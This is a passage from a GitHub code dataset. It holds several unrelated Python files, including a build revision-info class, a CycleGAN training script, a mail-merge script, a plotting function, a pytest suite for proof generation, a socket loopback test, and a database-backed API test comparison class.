'\\n\\t' + '\\n\\t'.join(sorted(package_targets))\n + '\\n Supplied Target Packages:'\n + '\\n\\t' + '\\n\\t'.join(sorted(revision_targets)))\n\n def LoadRevisionFile(self, revision_file, skip_hash_verify=False):\n \"\"\"Loads a revision JSON file into this object.\n\n Args:\n revision_file: File name for a revision JSON file.\n skip_hash_verify: If True, will skip the hash validation check. This\n should only be used if a field has been added or\n removed in order to recalculate the revision hash.\n \"\"\"\n try:\n with open(revision_file, 'rt') as f:\n revision_json = json.load(f)\n\n self._package_name = revision_json[FIELD_PACKAGE_NAME]\n self._revision_num = revision_json[FIELD_REVISION]\n self._package_targets = {}\n\n package_targets = revision_json[FIELD_PACKAGE_TARGETS]\n for package_target, archive_list in package_targets.iteritems():\n self._package_targets[package_target] = package_info.PackageInfo(\n archive_list\n )\n except (TypeError, KeyError) as e:\n raise error.Error('Invalid revision file [%s]: %s' %\n (revision_file, e))\n\n self._ValidateRevisionComplete()\n\n if not skip_hash_verify:\n hash_value = revision_json[FIELD_REVISION_HASH]\n if self._GetRevisionHash() != hash_value:\n raise error.Error('Invalid revision file [%s] - revision hash check '\n 'failed' % revision_file)\n\n def SaveRevisionFile(self, revision_file):\n \"\"\"Saves this object to a revision JSON file to be loaded later.\n\n Args:\n revision_file: File name where revision JSON file will be saved.\n \"\"\"\n self._ValidateRevisionComplete()\n\n package_targets = {}\n for package_target, package_desc in self._package_targets.iteritems():\n package_targets[package_target] = package_desc.DumpPackageJson()\n\n revision_json = {\n FIELD_PACKAGE_NAME: self._package_name,\n FIELD_REVISION: self._revision_num,\n FIELD_PACKAGE_TARGETS: package_targets,\n FIELD_REVISION_HASH: self._GetRevisionHash()\n }\n\n with open(revision_file, 'wt') as f:\n json.dump(revision_json, f, sort_keys=True,\n indent=2, separators=(',', ': '))\n\n def SetRevisionNumber(self, revision_num):\n \"\"\"Sets the current revision number for this object.\"\"\"\n self._revision_num = revision_num\n\n def GetRevisionNumber(self):\n \"\"\"Gets the currently set revision number for this object.\"\"\"\n return self._revision_num\n\n def ClearRevisions(self):\n \"\"\"Clears all package information for this object\"\"\"\n self._package_name = None\n self._package_targets = {}\n\n def SetTargetRevision(self, package_name, package_target, package_desc):\n \"\"\"Sets a package description for a package target.\n\n The package description is a package_info object representing the package\n for this particular revision.\n\n Args:\n package_name: Name of the package this revision object represents.\n package_target: Package target name for the package we are setting.\n package_desc: package_info object representing the package target.\n \"\"\"\n if self._package_name is None:\n self._package_name = package_name\n elif self._package_name != package_name:\n raise error.Error('Revision information must be all for the '\n 'same package\\n'\n 'Original package name: %s\\nNew package name: %s'\n % (self._package_name, package_name))\n self._package_targets[package_target] = package_desc\n\n def GetPackageInfo(self, package_target):\n \"\"\"Gets the package description for a particular package target.\n\n The package description is a package_info object representing the package\n for this particular revision.\n\n Args:\n package_target: Package target name for which we want the package info.\n\n Returns:\n A package_info object for the package target, or None for invalid targets.\n \"\"\"\n return self._package_targets.get(package_target, None)\n","repo_name":"kiwibrowser/src","sub_path":"native_client/build/package_version/revision_info.py","file_name":"revision_info.py","file_ext":"py","file_size_in_byte":7105,"program_lang":"python","lang":"en","doc_type":"code","stars":2475,"dataset":"github-code","pt":"52"} +{"seq_id":"70378326565","text":"import subprocess\nimport sys\nimport time\n\nsys.path.append(\"/nfs/project/libo_i/MADAN/cyclegan\")\nfrom options.train_options import TrainOptions\nfrom data import CreateDataLoader\nfrom models import create_model\nfrom util.visualizer import Visualizer\nimport torch\nimport logging\n\nif __name__ == '__main__':\n\topt = TrainOptions().parse()\n\tdata_loader = CreateDataLoader(opt)\n\tdataset = data_loader.load_data()\n\tdataset_size = len(data_loader)\n\tlogging.info('#training images = %d' % dataset_size)\n\tmodel = create_model(opt)\n\tmodel.setup(opt)\n\tvisualizer = Visualizer(opt)\n\ttotal_steps = 0\n\tfor epoch in range(opt.epoch_count, opt.niter + opt.niter_decay + 1):\n\t\tepoch_start_time = time.time()\n\t\titer_data_time = time.time()\n\t\tepoch_iter = 0\n\t\topt.current_epoch = epoch\n\t\tlogging.info(\"Current epoch update to {}\".format(opt.current_epoch))\n\t\tfor i, data in enumerate(dataset):\n\t\t\tif total_steps == 0:\n\t\t\t\tfor item in data.items():\n\t\t\t\t\tif isinstance(item[1], torch.Tensor):\n\t\t\t\t\t\tlogging.info(item[1].size())\n\t\t\titer_start_time = time.time()\n\t\t\tif total_steps % opt.print_freq == 0:\n\t\t\t\tt_data = iter_start_time - iter_data_time\n\t\t\tvisualizer.reset()\n\t\t\ttotal_steps += opt.batchSize\n\t\t\tepoch_iter += opt.batchSize\n\t\t\tmodel.set_input(data)\n\t\t\tmodel.optimize_parameters(opt)\n\t\t\t\n\t\t\tif total_steps % opt.display_freq == 0:\n\t\t\t\tsave_result = total_steps % opt.update_html_freq == 0\n\t\t\t\tvisualizer.display_current_results(model.get_current_visuals(), epoch, save_result)\n\t\t\t\n\t\t\tif total_steps % opt.print_freq == 0:\n\t\t\t\tlosses = model.get_current_losses()\n\t\t\t\tt = (time.time() - iter_start_time) / opt.batchSize\n\t\t\t\tvisualizer.print_current_losses(epoch, epoch_iter, losses, t, t_data)\n\t\t\t\tif opt.display_id > 0:\n\t\t\t\t\tvisualizer.plot_current_losses(epoch, float(epoch_iter) / dataset_size, opt, losses)\n\t\t\t\n\t\t\tif total_steps % opt.save_latest_freq == 0:\n\t\t\t\tlogging.info('saving the latest model (epoch %d, total_steps %d)' % (epoch, total_steps))\n\t\t\t\tmodel.save_networks('latest')\n\t\t\titer_data_time = time.time()\n\t\t\n\t\tif epoch % opt.save_epoch_freq == 0:\n\t\t\tlogging.info('saving the model at the end of epoch %d, iters %d' % (epoch, total_steps))\n\t\t\tmodel.save_networks('latest')\n\t\t\tmodel.save_networks(epoch)\n\t\t\n\t\tlogging.info('End of epoch %d / %d \\t Time Taken: %d sec' % (epoch, opt.max_epoch, time.time() - epoch_start_time))\n\t\tmodel.update_learning_rate()\n","repo_name":"Luodian/MADAN","sub_path":"cyclegan/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2354,"program_lang":"python","lang":"en","doc_type":"code","stars":163,"dataset":"github-code","pt":"52"} +{"seq_id":"1384519989","text":"def automation_invitation():\n with open(\"/mail-merge-project-start/Input/Names/invited_names.txt\", mode=\"r\") as names:\n name_list = names.readlines()\n perfect_name = [elements.strip() for elements in name_list]\n \n \n with open(\"/mail-merge-project-start/Input/Letters/starting_letter.txt\", mode=\"r\") as mail:\n mail_list = mail.read()\n for lp in perfect_name:\n replace = mail_list.replace(\"[name]\", lp)\n with open(f\"/mail-merge-project-start/Output/ReadyToSend/letter_for_{lp}.txt\", mode=\"w\") as invitation:\n invitation.write(replace)\n\nautomation_invitation()\n","repo_name":"YuvanVarshith/Mail_Merge_Automation","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"38279809564","text":"#!/usr/bin/python3\n#####################################################\n# Author: Vojtěch Ulej (xulejv00) #\n# Created: 4. 11. 2020 #\n# Description: Implementation of function plot_stat #\n#####################################################\n\nimport download\nimport os\nfrom sys import argv\nimport code\nimport argparse\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# Function takes data from data_source and plots them\ndef plot_stat(data_source, fig_location=None, show_figure=False):\n regs = data_source[1][0] # np.array of regions\n dates = data_source[1][4] # np.array of dates\n regions = np.unique(regs) # array of unique regions\n years = set() # All years from dataset\n for d in dates:\n years.add(d.astype(object).year)\n years = sorted(years)\n accidents_by_reg_year = [] # Accidents in region and year (list of tupple(region, year, accidents_count))\n for r in regions:\n accidents_dates_by_reg = dates[regs == r] # Accidents dates in region r\n for i in range(len(years)):\n if i != len(years) - 1:\n # Count of accidents in year years[i]\n # This is calculated ass accidents till year years[i] - accidents till year years[i+1]\n # eg. Accident for year >= 2016 - year >= 2017\n count = np.count_nonzero(accidents_dates_by_reg >= np.datetime64(str(years[i]))) - np.count_nonzero(\n accidents_dates_by_reg >= np.datetime64(str(years[i + 1])))\n else: # last year\n count = np.count_nonzero(accidents_dates_by_reg >= np.datetime64(str(years[i])))\n accidents_by_reg_year.append((r, years[i], count))\n # Sort accidents by year and count (reverse) so first is region with highest count of accidents in highest year (2020)\n accidents_by_reg_year.sort(key=lambda x: x[2], reverse=True) # Sort by count\n accidents_by_reg_year.sort(key=lambda x: x[1], reverse=True) # Sort by year\n i = 0\n data_to_plot = [] # every element is tuple of tuples(region,year,accident_count) where year is same\n while i != len(accidents_by_reg_year): #\n data_to_plot.append(tuple(accidents_by_reg_year[i:i + len(regions)]))\n i += len(regions)\n # Figure for ploting\n fig, ax = plt.subplots(len(data_to_plot),figsize=(7.75,10.25)) # figsize = a4 format in inches (nicer graphs for more regions)\n # This cycle creates subplots for each year\n for idx, data in enumerate(data_to_plot):\n rects = ax[idx].bar([i[0] for i in data], [i[2] for i in data])\n # Annotation\n for i, rect in enumerate(rects):\n ax[idx].annotate(str(i+1) + '.',\n xy=(rect.get_x() + rect.get_width() / 2, rect.get_height()),\n xytext=(0, 1),\n textcoords=\"offset points\",\n ha='center', va='bottom'\n )\n ax[idx].set_title(str(data[0][1])) # Title of subplot is year\n y_l = ax[idx].get_ylim()\n ax[idx].set_ylim([y_l[0],y_l[1]+((y_l[1]/100)*15)]) # Make room for annotation (adding 15% to y max)\n ax[idx].set_ylabel(' ') # Make room for figure text 'Počet nehod'\n if data is data_to_plot[-1]: # if making last plot create x lable (same for every subplot so its not neccessery to write it to every subplot)\n ax[idx].set_xlabel('Kraje')\n fig.suptitle('Srovnání počtu nehod v krajích za jednotlivé roky')\n fig.text(0.015, 0.5, 'Počet nehod', va='center', rotation='vertical')\n fig.tight_layout()\n if fig_location is not None: # if location specified save figure\n dire = '/'.join(fig_location.split('/')[:-1]) # directories name\n if dire != '':\n if not os.path.exists(dire):\n os.makedirs(dire) # create dir\n fig.savefig(fig_location)\n if show_figure:\n fig.show()\n\n\nif __name__ == \"__main__\":\n DataDownloader = download.DataDownloader\n parser = argparse.ArgumentParser(description='Plot data for regions given to function plot_stat.')\n # To this variables will be stored values from cmd arguments\n show_figure = False\n fig_location = None\n ############################################################\n parser.add_argument('--show_figure', dest='show_figure', action='store_const',const=True, default=False)\n parser.add_argument('--fig_location', dest='fig_location', type=str, action='store', default=None)\n args,_ = parser.parse_known_args(argv[1:])\n show_figure = args.show_figure\n fig_location = args.fig_location\n # Example how to run function:\n # plot_stat(DataDownloader().get_list(),show_figure=True,fig_location='data/plot.png')\n # Running interactive console so user can run function\n code.interact(local=locals())\n\n","repo_name":"OrenVo/IZV-proj","sub_path":"1stPart/get_stat.py","file_name":"get_stat.py","file_ext":"py","file_size_in_byte":4833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4677042510","text":"#!/usr/bin/env python3\n\nimport pytest\nfrom collections import defaultdict\nfrom glob import glob\nfrom os import path, makedirs\nimport time\nfrom tabulate import tabulate\nfrom typing import Dict, List, NamedTuple, Optional, Tuple, no_type_check\nfrom subprocess import check_call, check_output\nfrom sys import argv\n\nimport maude\n\ntest_dir=\".build\"\n\n\n### Benchmarks ##################\n\nclass Benchmark(NamedTuple):\n join: Optional[int] = None\n compile: Optional[int] = None\n check: Optional[int] = None\n gen_mm0: Optional[int] = None\n join_mm0: Optional[int] = None\n gen_mm1: Optional[int] = None\n\nbenchmarks : Dict[str, Benchmark] = defaultdict(lambda: Benchmark())\n\ndef print_benchmarks() -> None:\n print(tabulate(((name, *value) for (name, value) in sorted(benchmarks.items())),\n headers=('name',) + Benchmark._fields\n ) )\n\nclass _Benchmark():\n def __init__(self, test_name: str, aspect: str):\n self.test_name = test_name\n self.aspect = aspect\n self.start = time.time_ns()\n def __enter__(self):\n return self\n def __exit__(self, exc_type, exc_val, exc_tb):\n end = time.time_ns()\n runtime = (end - self.start)\n benchmarks[self.test_name] = benchmarks[self.test_name]._replace(**{self.aspect: runtime})\n\ndef benchmark(test_name: str, aspect: str) -> _Benchmark:\n return _Benchmark(test_name, aspect)\n\n\n### PyTest Helpers #####################\n\ndef regex_to_id(exp: str) -> str:\n return exp.replace(' ', '') \\\n .replace('*', 'x') \\\n .replace('(', 'C') \\\n .replace(')', 'D') \\\n .replace('/\\\\', '@') \\\n .replace('\\\\/', '+') \\\n\n@no_type_check\ndef slow(*args):\n return pytest.param(*args, marks=pytest.mark.slow)\n\n### MM0 Helpers #######################\n\ndef join(input_file: str, output_file: str) -> None:\n check_call(['mm0-rs', 'join', input_file, output_file])\ndef compile(input_file: str, output_file: str) -> None:\n check_call(['mm0-rs', 'compile', '-q', '--warn-as-error', input_file, output_file])\ndef check(mmb_file: str, mm0_file: str) -> None:\n with open(mm0_file) as f:\n check_call(['mm0-c', mmb_file], stdin=f)\n\ndef run_proof_gen(mode: str, theorem: str, regex: str, output_file: str) -> None:\n with open(output_file, 'w') as f:\n check_call(['./proof-gen.py', mode, theorem, regex], stdout=f)\n\n\n### Tests: Maude #######################\n\ndef test_maude_version() -> None:\n maude.check_maude_version()\n\ndef test_maude_unit_tests() -> None:\n assert maude.reduce_in_module('test.maude', 'TEST', 'TestResult', 'unit-tests') == 'passed'\n\n\n### Test: proof check base MM0/1 files ##########################\n\nmakedirs(test_dir, exist_ok=True)\nlast_mm0_file = None\nbase_mm_tests = []\nfor f in sorted((glob('*.mm0') + glob('*.mm1'))):\n if path.splitext(f)[1] == '.mm0':\n last_mm0_file = path.join(test_dir, 'joined.' + f)\n join(f, last_mm0_file)\n assert last_mm0_file\n base_mm_tests += [(last_mm0_file, f)]\n\n@pytest.mark.parametrize('mm0_file,mm1_file', base_mm_tests)\ndef test_mm(mm0_file: str, mm1_file: str) -> None:\n basename = path.basename(mm1_file)\n test_name, extension = path.splitext(basename)\n output_basename = path.join(test_dir, test_name)\n output_joined = path.join(test_dir, test_name + '.joined' + extension)\n output_mmb = path.join(test_dir, test_name + '.mmb')\n\n print(\"Testing: %s\" % test_name)\n # There seems to be a bug in mm0-rs that causes the program to crash\n # when compiling un-joined files.\n with benchmark(test_name, 'join'): join(mm1_file, output_joined)\n with benchmark(test_name, 'compile'): compile(output_joined, output_mmb)\n with benchmark(test_name, 'check'): check(output_mmb, mm0_file)\n\n\n### Test: proof generated certificates ##########################\n\n@pytest.mark.parametrize('theorem,test_name,regex',\n[ ('main-goal', 'a-or-b-star', '(a + b)*'),\n ('main-goal', 'kleene-star-star', '(a *) * ->> (a *)'),\n ('main-goal', 'example-in-paper', '(a . a)* ->> (((a *) . a) + epsilon) '),\n ('main-goal', 'alternate-top', '((a *) . b) * + (((b *) . a) *)'),\n ('main-goal', 'even-or-odd', '((((a . a) + (a . b)) + (b . a)) + (b . b)) * + ((a + b) . (((((a . a) + (a . b)) + (b . a)) + (b . b)) *))'),\n ('main-goal', 'no-contains-a-or-no-only-b', '(~ (top . (a . top))) + ~ (b *)'),\n])\ndef test_regex(theorem: str, test_name: str, regex: str) -> None:\n output_mm0_file = path.join(test_dir, test_name + '.mm0')\n output_joined_mm0_file = path.join(test_dir, test_name + '.joined.mm0')\n output_mm1_file = path.join(test_dir, test_name + '.mm1')\n output_joined_mm1_file = path.join(test_dir, test_name + '.joined.mm1')\n\n with benchmark(test_name, 'gen_mm0'): run_proof_gen('mm0', theorem, regex, output_mm0_file)\n with benchmark(test_name, 'join_mm0'): join(output_mm0_file, output_joined_mm0_file)\n with benchmark(test_name, 'gen_mm1'): run_proof_gen('mm1', theorem, regex, output_mm1_file)\n test_mm(output_joined_mm0_file, output_mm1_file)\n\n# Benchmarks from Unified Decision Procedures for Regular Expression Equivalence\n# https://citeseerx.ist.psu.edu/document?repid=rep1&type=pdf&doi=f650281fc011a2c132690903eb443ff1ab3298f7\n\n@pytest.mark.parametrize('n', [1, 2, 4, slow(10), slow(20), slow(30), slow(40), slow(100)])\ndef test_regex_match_l(n: int) -> None:\n test_regex('main-goal', 'match-l-{:03d}'.format(n), 'match-l({})'.format(n))\n\n@pytest.mark.parametrize('n', [1, 2, 4, slow(10), slow(20), slow(30)])\ndef test_regex_match_r(n: int) -> None:\n test_regex('main-goal', 'match-r-{:03d}'.format(n), 'match-r({})'.format(n))\n\n@pytest.mark.parametrize('n', [1, 2, 4, slow(10), slow(20), slow(30)])\ndef test_regex_eq_l(n: int) -> None:\n test_regex('main-goal', 'eq-l-{:03d}'.format(n), 'eq-l({})'.format(n))\n\n@pytest.mark.parametrize('n', [1, 2, 4, slow(10), slow(20), slow(30)])\ndef test_regex_eq_r(n: int) -> None:\n test_regex('main-goal', 'eq-r-{:03d}'.format(n), 'eq-r({})'.format(n))\n\n@pytest.mark.parametrize('n', [1, 2, 4, slow(10), slow(20), slow(30)])\ndef test_regex_eq_lr(n: int) -> None:\n test_regex('main-goal', 'eq-lr-{:03d}'.format(n), 'eq-lr({})'.format(n))\n\n@pytest.mark.parametrize('exp', [\n 'a',\n '(a . a) . (a . a)',\n '(a + b)',\n '(( (b . b) * ) . ( b * ))',\n '( a /\\\\ ( a /\\\\ b ) )',\n '(bot . bot)*',\n])\ndef test_regex_implies_self(exp: str) -> None:\n id = regex_to_id(exp)\n test_regex('main-goal', 'implies-self-{}'.format(id), '{} ->> {}'.format(exp, exp))\n\n\n### Randomized tests using hypothesis\n\nfrom typing import Callable\nimport hypothesis\nfrom hypothesis import given, settings\nfrom hypothesis.strategies import composite, just, recursive, SearchStrategy, DrawFn\n\ndef regex() -> SearchStrategy[str]:\n\n def epsilon() -> SearchStrategy[str]:\n return just('epsilon')\n\n def bot() -> SearchStrategy[str]:\n return just('bot')\n\n def letters() -> SearchStrategy[str]:\n return just('a') | just('b')\n\n @composite\n def neg(draw: DrawFn, arg: SearchStrategy[str]) -> str:\n return '( ~ ' + draw(arg) + ')'\n\n @composite\n def kleene(draw: DrawFn, arg: SearchStrategy[str]) -> str:\n return '( ' + draw(arg) + ' * )'\n\n @composite\n def concat(draw: DrawFn, arg: SearchStrategy[str]) -> str:\n return '(' + draw(arg) + ' . ' + draw(arg) + ')'\n\n @composite\n def plus(draw: DrawFn, arg: SearchStrategy[str]) -> str:\n return '( ' + draw(arg) + ' + ' + draw(arg) + ' )'\n\n return recursive(bot() | epsilon() | letters(),\n lambda sub: concat(sub) | kleene(sub) | plus(sub))\n\n@given(regex())\n@settings(deadline=20*1000, verbosity=hypothesis.Verbosity.verbose, max_examples=10)\n@pytest.mark.slow\ndef test_equiv(exp):\n test_regex_implies_self(exp)\n\n\nprint_benchmarks()\n","repo_name":"MirceaS/matching-logic-mm0","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":8018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"24163082311","text":"#!/usr/bin/python3\n\nimport socket\nimport subprocess\nimport sys\nimport os\n\n# if no port is passed, a connection to localhost is assumed and a server is spun up to listen\n# if we're connecting to a local server, we spin through a list of 100 ports to find whatever's available\ndef conntest(host, portIn=None):\n cdemo = os.path.join(sys.path[0], \"../cdemo/cdemo\")\n if not os.path.isfile(cdemo):\n cdemo += \".exe\"\n if not os.path.isfile(cdemo):\n print(\"Test code must be compiled prior to running test.\")\n sys.exit(1)\n\n if portIn is None:\n addr = socket.getaddrinfo(host, 0,0, socket.SOCK_STREAM)\n af,socktype, proto, canonname, sa = addr[0]\n s = socket.socket(af, socket.SOCK_STREAM)\n s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n for port in range (8000,8100):\n try:\n s.bind((host, port))\n break\n except OSError:\n pass\n s.listen(1)\n else:\n port = portIn\n p = subprocess.Popen([cdemo, host, str(port)])\n if portIn is None:\n conn, addr = s.accept()\n\n while True:\n try:\n data = conn.recv(1024)\n except socket.timeout:\n print(\"timeout\")\n if not data:\n break\n else:\n conn.send(data)\n conn.send(data)\n conn.send(data)\n conn.close()\n s.close()\n break\n\n return p.wait()\n\ndef setup_module():\n os.environ['LD_LIBRARY_PATH'] = '..'\n\ndef test_ack_loop_v4():\n assert conntest(\"127.0.0.1\") == 0, \"IPv4 loopback test\"\n\ndef test_ack_loop_v6():\n assert conntest(\"::1\") == 0, \"IPv6 loopback test\"\n\ndef test_ack_remote_v4():\n assert conntest(\"ipv4.google.com\", 80) == 0, \"IPv4 remote test\"\n\ndef test_ack_remote_v6():\n assert conntest(\"ipv6.google.com\", 80) == 0, \"IPv6 remote test\"\n","repo_name":"n8vi/acktrack","sub_path":"tests/test_functional.py","file_name":"test_functional.py","file_ext":"py","file_size_in_byte":1940,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"5643941397","text":"# Definition for singly-linked list.\r\n# class ListNode:\r\n# def __init__(self, val=0, next=None):\r\n# self.val = val\r\n# self.next = next\r\nclass Solution:\r\n def reverseKGroup(self, head: Optional[ListNode], k: int) -> Optional[ListNode]:\r\n dummy = ListNode(0, head)\r\n grouprev = dummy\r\n \r\n while True:\r\n kth = self.getkth(grouprev, k)\r\n if not kth:\r\n break\r\n groupNext = kth.next\r\n \r\n prev, curr = kth.next, grouprev.next\r\n while curr != groupNext:\r\n temp = curr.next\r\n curr.next = prev\r\n prev = curr\r\n curr = temp\r\n temp = grouprev.next \r\n grouprev.next = kth\r\n grouprev = temp\r\n return dummy.next\r\n \r\n \r\n def getkth(self, curr, k):\r\n while curr and k > 0:\r\n curr = curr.next\r\n k -= 1\r\n return curr\r\n \r\n \r\n ","repo_name":"samyogita/LeetCode-problems","sub_path":"reversenodekgroup.py","file_name":"reversenodekgroup.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"43182891399","text":"#LettCode 53\n\nclass Solution:\n def maxSubArray(self, nums: List[int]) -> int:\n \n if len(nums) == 1:\n return nums[0]\n \n newNum = maxTotal = nums[0]\n \n for i in range(1, len(nums)):\n newNum = max(nums[i], nums[i] + newNum) #This will give Maximum Ending Number so far\n maxTotal = max(newNum, maxTotal) #This will give Maximum Global Number so far\n \n return maxTotal\n","repo_name":"rajpatel9498/LeetCode_Solutions","sub_path":"Easy/MaximumSubarray.py","file_name":"MaximumSubarray.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"7056449641","text":"#__author__='cuiwenhao'\n#-*-coding:utf-8-*-\nimport importlib,sys,os,json,logging\nimportlib.reload(sys)\n\nfrom Common.Operation_Interface import Operation_Interface\nOperation_db = Operation_Interface()\n\n\nclass Compare_param(object):\n '''\n 定义比较类,包含code比较,参数完成性比较,功能测试比较三种方法\n '''\n #初始化数据\n def __init__(self,params_interface):\n global result\n self.params_interface = params_interface#接口入参\n self.id_case=params_interface['id']#测试用id\n self.result_list_response=[]#定义用来储存参数集的空列表\n self.params_to_compare=params_interface['params_to_compare']\n\n\n #定义关键参数值(code)比较\n def Compare_code(self,result_interface):\n '''\n :param result_interface:HTTP返回 包数据\n :return: 返回码code,返回信息Message,数据data\n '''\n try:\n if json.loads(result_interface):\n temp_result_interface=json.loads(result_interface)#将字符类型转换成字典类型\n temp_code_to_compare=self.params_interface['code_to_compare']#获取待比较code名称\n if temp_code_to_compare in temp_result_interface:\n if str(temp_result_interface[temp_code_to_compare])==str(self.params_interface['code_expect']):\n result={'code':'0000','message':u'关键字参数相同','data':[]}\n Operation_db.op_sql(\"UPDATE case_interface set code_actual='%s',result_code_compare=%s,result_interface='%s' where id='%s'\"\n %(temp_result_interface[temp_code_to_compare],0,result_interface,self.id_case))\n elif str(temp_result_interface[temp_code_to_compare])!=str(self.params_interface['code_expect']):\n result = {'code':'1003','message':u'关键字参数不相同','data':[]}\n Operation_db.op_sql(\"UPDATE case_interface set code_actual='%s',result_code_compare=%s,result_interface='%s' where id='%s'\"\n %(temp_result_interface[temp_code_to_compare],1,result_interface,self.id_case))\n\n else:\n result={'code':'1002','message':u'关键字参数比较出错','data':[]}\n Operation_db.op_sql(\"UPDATE case_interface set code_actual='%s',result_code_compare=%s,result_interface='%s' where id='%s'\"\n % (temp_result_interface[temp_code_to_compare], 3, result_interface,self.id_case))\n\n\n else:\n result={'code':'1001','message':u'返回包数据无关键字参数','data':[]}\n Operation_db.op_sql(\"UPDATE case_interface set result_code_compare=%s,result_interface='%s' where id='%s'\"\n %(2,result_interface,self.id_case))\n\n else:\n result = {'code': '1000', 'message': u'返回包格式不合法', 'data': []}\n Operation_db.op_sql(\"UPDATE case_interface set result_code_compare=%s,result_interface='%s' where id='%s'\"\n %(4,result_interface,self.id_case))\n\n except Exception as error:#记录到log.txt文件\n result= {'code': '9999', 'message': u'关键字参数比较异常', 'data': []}\n Operation_db.op_sql(\"UPDATE case_interface set result_code_compare=%s,result_interface='%s' where id='%s'\"\n %(9,result_interface,self.id_case))\n\n logging.basicConfig(filename=os.path.join(os.getcwd(), '../Log/syserror.log'),\n level=logging.DEBUG,\n format='%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s')\n logger = logging.getLogger(__name__)\n logger.exception(error)\n return result\n\n #定义接口返回数据中参数名写入列表中\n def Get_compare_params(self,result_interface):\n '''\n :param result_interface:HTTP返回 包数据\n :return: 返回码code,返回信息Message,数据data\n '''\n try:\n if json.loads(result_interface):\n temp_result_interface=json.loads(result_interface)#将字符类型转换成字典类型\n self.result_list_response= list(temp_result_interface.keys())\n\n result= {'code': '0000', 'message': u'成功', 'data':self.result_list_response}\n else:\n result= {'code': '1000', 'message': u'返回包格式不合法', 'data':[]}\n except Exception as error: # 记录到log.txt文件\n result = {'code': '9999', 'message': u'处理数据异常', 'data': []}\n\n logging.basicConfig(filename=os.path.join(os.getcwd(), './syserror.Log'),\n level=logging.DEBUG,\n format='%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s')\n logger = logging.getLogger(__name__)\n logger.exception(error)\n return result\n\n #参数完整性比较方法,传参值与get_compare_params方法返回结果比较\n def Compare_params_complete(self,result_interface):\n '''\n :param result_interface:HTTP返回 包数据\n :return: 返回码code,返回信息Message,数据data\n '''\n try:\n temp_compare_params=self.Get_compare_params(result_interface)#获取返回包参数集\n if temp_compare_params['code']=='0000':\n temp_result_list_response=temp_compare_params['data']#获取接口返回参数去重列表\n\n\n if self.params_to_compare==u'' or isinstance(self.params_to_compare,(tuple,dict)):#判断用例中数据为空或者类型不符合\n result = {'code': '4001', 'message': u'用例中待比较参数集错误', 'data': self.params_to_compare}\n else:\n list_params_to_compare=eval(self.params_to_compare)#数据库表unicode编码数据转换成员列\n if set(list_params_to_compare).issubset(set(temp_result_list_response)):#集合的包含关系 后边包括前边\n\n result = {'code': '0000', 'message': u'参数完成性比较一致', 'data': []}\n Operation_db.op_sql('UPDATE case_interface set params_actual=\"%s\",result_params_compare=%s where id=\"%s\"'\n % (temp_result_list_response, 0, self.id_case))\n else:\n result = {'code': '3001', 'message': u'实际结果中元素不都在预期结果中', 'data': []}\n Operation_db.op_sql('UPDATE case_interface set params_actual=\"%s\",result_params_compare=%s where id=\"%s\"'\n % (temp_result_list_response, 1, self.id_case))\n else:\n result = {'code': '2001', 'message': u'调用get_compare_params方法返回错误', 'data':[]}\n Operation_db.op_sql('UPDATE case_interface set result_params_compare=%s where and id=\"%s\"'%(2,self.id_case))\n\n except Exception as error: # 记录到log.txt文件\n result = {'code': '9999', 'message': u'参数完整性异常', 'data': []}\n Operation_db.op_sql('UPDATE case_interface set result_params_compare=%s where id=\"%s\"'%(9,self.id_case))\n\n\n logging.basicConfig(filename=os.path.join(os.getcwd(), './syserror.Log'),\n level=logging.DEBUG,\n format='%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s')\n logger = logging.getLogger(__name__)\n logger.exception(error)\n return result\n\n # 定义递归方法\n def recur_params(self, result_interface):\n # 定义递归操作,将接口返回数据中参数名写入列表中(去重)\n try:\n if isinstance(result_interface, (str)) and json.loads(result_interface): # 入参是字符串类型且能被转换成字典\n temp_result_interface = json.loads(result_interface)\n self.recur_params(temp_result_interface)\n elif isinstance(result_interface, dict): # 入参是字典\n for param, value in result_interface.items():\n self.result_list_response.append(param)\n if isinstance(value, list):\n for param in value:\n self.recur_params(param)\n elif isinstance(value, dict):\n self.recur_params(value)\n else:\n continue\n else:\n pass\n except Exception as error: # 记录日志到log.txt文件\n logging.basicConfig(filename=os.path.join(os.getcwd(), '../log/syserror.log'), level=logging.DEBUG,\n format='%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s')\n logger = logging.getLogger(__name__)\n logger.exception(error)\n return {'code': '9999', 'message': u'处理数据异常', 'data': []}\n return {'code': '0000', 'message': u'成功', 'data': list(set(self.result_list_response))}\n\n\n\n\n\n#新增将response请求错误的message和code写入sql\n def Write_to_messageandcode(self,result_interface):\n '''\n :param result_interface: HTTP返回 包数据\n :return:返回码code,返回信息Message,数据data\n '''\n try:\n if json.loads(result_interface):\n temp_result_interface = json.loads(result_interface) # 将字符类型转换成字典类型\n\n if temp_result_interface.__contains__('state'):\n temp_result_state=str(temp_result_interface['state']) #获取response state的值\n\n # dict.__contains__(key)如果键在字典dict里返回true,否则返回false。\n if temp_result_state!='1':\n if temp_result_state!='True':\n if temp_result_interface.__contains__('message') and temp_result_interface.__contains__('code'):\n temp_result_message=temp_result_interface['message'] #获取reponse message的值\n temp_result_code=temp_result_interface['code']\n\n result = {'code': '0000', 'message': u'response包含message,code准备写入sql', 'data': []}\n\n Operation_db.op_sql('UPDATE case_interface set result_message=\"%s\",result_code=\"%s\" where id=\"%s\"'\n % (temp_result_message,temp_result_code , self.id_case))\n else:\n result = {'code': '1001', 'message': 